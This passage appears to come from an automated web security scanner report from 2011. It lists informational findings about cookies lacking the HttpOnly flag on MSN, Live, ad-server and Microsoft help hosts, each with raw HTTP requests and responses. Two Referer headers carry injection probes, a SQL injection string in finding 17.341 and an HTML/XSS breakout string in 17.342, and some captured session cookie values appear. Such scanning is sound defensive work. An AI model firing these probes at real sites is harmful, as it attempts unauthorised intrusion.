Set-Cookie: jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=fce2ee8d67554dafa8996a80449bf770-349642143-XI-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X1974D75CFDC14C842AF27C9499CC36681A09DA126FC89CDE67D6CB317A39CA4DEA45CDDE40FA597B269AF1D1F84882078; domain=.careerbuilder.com; expires=Sun, 29-Jan-2012 23:49:02 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEARWEB49
Date: Sat, 29 Jan 2011 23:49:02 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Job Se
...[SNIP]...

17.332. http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s21495556451845

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msnbc.112.2o7.net
Path:   /b/ss/msnbcnewsvine,msnbcom/1/H.17/s21495556451845

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/msnbcnewsvine,msnbcom/1/H.17/s21495556451845 HTTP/1.1
Host: msnbc.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26968B5085012741-4000010BE0000504[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 01:22:03 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x60x7Econchzx7Ex7Bdch=[CS]v4|0-0|4D44BD3B[CE]; Expires=Fri, 29 Jan 2016 01:22:03 GMT; Domain=.2o7.net; Path=/
Location: http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s21495556451845?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Sat, 29 Jan 2011 01:22:03 GMT
Last-Modified: Mon, 31 Jan 2011 01:22:03 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www383
Content-Length: 0
Content-Type: text/plain
Connection: close


17.333. http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23775069806724

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msnbc.112.2o7.net
Path:   /b/ss/msnbcnewsvine,msnbcom/1/H.17/s23775069806724

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/msnbcnewsvine,msnbcom/1/H.17/s23775069806724 HTTP/1.1
Host: msnbc.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26968B5085012741-4000010BE0000504[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 02:16:21 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x60x7Econchzx7Ex7Bdch=[CS]v4|0-0|4D44C9F5[CE]; Expires=Fri, 29 Jan 2016 02:16:21 GMT; Domain=.2o7.net; Path=/
Location: http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23775069806724?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Sat, 29 Jan 2011 02:16:21 GMT
Last-Modified: Mon, 31 Jan 2011 02:16:21 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www391
Content-Length: 0
Content-Type: text/plain
Connection: close


17.334. http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23824761856812

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msnbc.112.2o7.net
Path:   /b/ss/msnbcnewsvine,msnbcom/1/H.17/s23824761856812

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/msnbcnewsvine,msnbcom/1/H.17/s23824761856812 HTTP/1.1
Host: msnbc.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|26968B5085012741-4000010BE0000504[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 01:22:03 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x60x7Econchzx7Ex7Bdch=[CS]v4|0-0|4D44BD3B[CE]; Expires=Fri, 29 Jan 2016 01:22:03 GMT; Domain=.2o7.net; Path=/
Location: http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23824761856812?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Sat, 29 Jan 2011 01:22:03 GMT
Last-Modified: Mon, 31 Jan 2011 01:22:03 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www598
Content-Length: 0
Content-Type: text/plain
Connection: close


17.335. https://msnia.login.live.com/ppsecure/post.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://msnia.login.live.com
Path:   /ppsecure/post.srf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ppsecure/post.srf HTTP/1.1
Host: msnia.login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:14:43 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: TK2IDSMLGN1C04 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:13:43 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPOK=$uuid-0b57eae4-cbe7-4619-b132-61d19b680035; domain=login.live.com;path=/;version=1
X-Frame-Options: deny
Content-Length: 11551

<!-- ServerInfo: TK2IDSMLGN1C04 2011.01.07.23.08.26 Live1 Unknown LocVer:0 -->
<!-- PreprocessInfo: BTSA007:RR1BLDA045, -- Version: 9,0,16533,0 -->
<!-- RequestLCID: 1033, Market:EN-US, PrefCountry
...[SNIP]...

17.336. http://msnportal.112.2o7.net/b/ss/msnportalhome/1/H.7-pdv-2/{0}

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msnportal.112.2o7.net
Path:   /b/ss/msnportalhome/1/H.7-pdv-2/{0}

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/msnportalhome/1/H.7-pdv-2/{0} HTTP/1.1
Host: msnportal.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 23:50:09 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x60x7Ecx7Dbx7Fylaebx60h=[CS]v4|0-0|4D44A7B1[CE]; Expires=Thu, 28 Jan 2016 23:50:09 GMT; Domain=.2o7.net; Path=/
Location: http://msnportal.112.2o7.net/b/ss/msnportalhome/1/H.7-pdv-2/{0}?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Fri, 28 Jan 2011 23:50:09 GMT
Last-Modified: Sun, 30 Jan 2011 23:50:09 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www70
Content-Length: 0
Content-Type: text/plain
Connection: close


17.337. http://msnportal.112.2o7.net/b/ss/msnportalusenmoney/1/H.7-pdv-2/{0}

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msnportal.112.2o7.net
Path:   /b/ss/msnportalusenmoney/1/H.7-pdv-2/{0}

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/msnportalusenmoney/1/H.7-pdv-2/{0} HTTP/1.1
Host: msnportal.112.2o7.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi_kx60gx60w=[CS]v4|26A20C60051617F4-40000183C02A4478|4D4418BF[CE]; s_vi_bohx7Fbcx7Dbjbx7Eyi=[CS]v4|2694879D05010AB6-600001152001C1C9|4D290F39[CE]; s_vi=[CS]v1|2693B20C05013B68-4000010D20126E16|dinydefxxelh|2696E365851591F8-40000180E0024F83[CE]; s_vi_x7Fx7Ex7Cyx7Eux3Dx7Bux7Ex3Dcduyx7E=[CS]v4|26A0E5B58501123C-400001062000534C|4D41CB69[CE]; s_vi_nxxx7Cbx60mfcjxxwx7Fx7Dx60k=[CS]v4|2697CD9905013D57-60000105600F9188|4D2F9B0A[CE]; s_vi_bwvx7Bux60wwqwasx60x3Fbx60x7Dv=[CS]v4|2696ED9D05011A65-6000010260187391|4D2E46F2[CE]; s_vi_dinydefxxelh=[CS]v4|2696E37B85158159-40000175A004C187|4D30BC07[CE];

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 02:16:45 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Fax7Cbx7Dx60fsx7Egawx7Cx7Fx7Dx7Cwk=[CS]v4|0-0|4D44CA0D[CE]; Expires=Fri, 29 Jan 2016 02:16:45 GMT; Domain=.2o7.net; Path=/
Location: http://msnportal.112.2o7.net/b/ss/msnportalusenmoney/1/H.7-pdv-2/{0}?AQB=1&pccr=true&g=none&AQE=1
X-C: ms-4.3.1
Expires: Sat, 29 Jan 2011 02:16:45 GMT
Last-Modified: Mon, 31 Jan 2011 02:16:45 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www52
Content-Length: 0
Content-Type: text/plain
Connection: close


17.338. http://music.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://music.redacted
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: music.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 96630
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=d50ddeb179d249659073f8d313a6170a; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:50:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   MSN Music:
...[SNIP]...

17.339. http://my.live.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://my.live.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: my.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 01:22:04 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: WEBA01
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://my.redacted
Set-Cookie: mktstate=S=306174342&U=&E=&P=&B=en; domain=live.com; path=/
Set-Cookie: mkt1=norm=en-us; domain=live.com; path=/
Set-Cookie: mkt2=ui=en-us; domain=my.live.com; path=/
Set-Cookie: lastMarket=en-us; domain=.live.com; path=/
Set-Cookie: lastMktPath=en/us; domain=.live.com; path=/
Set-Cookie: frm=true; domain=.live.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 134

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://my.redacted">here</a>.</h2>
</body></html>

17.340. http://my.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://my.redacted
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: my.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 29 Jan 2011 23:50:18 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPMYREN04
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345018&rver=5.5.4177.0&wp=mbi&wreply=http:%2f%2fmy.msn.com%2f&lc=1033&id=254014
Set-Cookie: MC1=V=3&GUID=992d4dfe4a3a437b8a4c171fc7cceb14; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
Cache-Control: no-cache
Cache-Control: no-store, must-revalidate, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 287

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296345018&amp;rver=5.5.4177.0&amp;wp=mbi&amp;wrep
...[SNIP]...

17.341. http://oasc03049.popsci.com/RealMedia/ads/adstream_mjx.ads/www.popsci.com/index.jsp/1660224145@Top,Top1,Right1,Right2,Right3,Bottom,BottomRight,Position1,x96,Frame1,x89,x90,x01,x02,x03,x04,x05

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc03049.popsci.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.popsci.com/index.jsp/1660224145@Top,Top1,Right1,Right2,Right3,Bottom,BottomRight,Position1,x96,Frame1,x89,x90,x01,x02,x03,x04,x05

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.popsci.com/index.jsp/1660224145@Top,Top1,Right1,Right2,Right3,Bottom,BottomRight,Position1,x96,Frame1,x89,x90,x01,x02,x03,x04,x05? HTTP/1.1
Host: oasc03049.popsci.com
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/?172683569'%20or%201%3d1--%20=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS98684d1eb89eae890ac2d30814f7062d=v2tc6q1pdr66s599a60pjsel52

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:16:01 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=rcHW801FnNEABrjk; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.popsci.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 13662
Content-Type: application/x-javascript
Set-Cookie: NSC_d14efm_qppm_iuuq=ffffffff09499e5845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Bottom') {
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="htt
...[SNIP]...

17.342. http://oascentral.scientificamerican.com/RealMedia/ads/adstream_mjx.ads/sciam.com/observations/1762199143@Top,Right1,Right2,x40,x41

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.scientificamerican.com
Path:   /RealMedia/ads/adstream_mjx.ads/sciam.com/observations/1762199143@Top,Right1,Right2,x40,x41

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RealMedia/ads/adstream_mjx.ads/sciam.com/observations/1762199143@Top,Right1,Right2,x40,x41?observations&&&referrer=http://burp/show/60 HTTP/1.1
Host: oascentral.scientificamerican.com
Proxy-Connection: keep-alive
Referer: http://www.scientificamerican.com/blog/observations/?9edcb%22%3E%3Ca%3E429173c9aec=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:14:45 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=rcHW801FnIUACoU2; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.scientificamerican.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 7042
Content-Type: application/x-javascript
Set-Cookie: NSC_d14efm_qppm_iuuq=ffffffff09499e5945525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2005419&PluID=0&w=300&h=250&ncu=$$http://oasc
...[SNIP]...

17.343. http://onlinehelp.microsoft.com/en-us/bing/ff808490.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-us/bing/ff808490.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/bing/ff808490.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAABHBwAAm7TtVgJMvgFAgnqZu/TJhg!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:50:26 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:50:26 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:50:25 GMT
Content-Length: 34741


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...

17.344. http://onlinehelp.microsoft.com/en-us/msn/money.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-us/msn/money.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/msn/money.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAADfBgAA2AXSEcBOJjoMRri+WPCcHQ!!&M=1; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:24 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:24 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:17:23 GMT
Content-Length: 26482


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...

17.345. http://onlinehelp.microsoft.com/en-us/msn/qwlinfo.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-us/msn/qwlinfo.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/msn/qwlinfo.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAADHCAAA266j5xBE5bvLgdGilVUO5Q!!&M=1; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:28 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:28 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:17:27 GMT
Content-Length: 28036


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...

17.346. http://onlinehelp.microsoft.com/en-us/msn/qwlnotyours.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-us/msn/qwlnotyours.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/msn/qwlnotyours.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAAAVBwAAg+A0N79NlMCN1BebkgAdCA!!&M=1; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:27 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 30-Jan-2041 02:17:27 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 02:17:26 GMT
Content-Length: 24860


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...

17.347. http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-us/msn/thebasics.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en-us/msn/thebasics.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAAAKBwAA5krr+oNHqj3Y35ynMPVKcA!!&M=1; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:50:26 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Tue, 29-Jan-2041 23:50:26 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:50:26 GMT
Content-Length: 21044


<?xml version="1.0" encoding="UTF-8" ?>
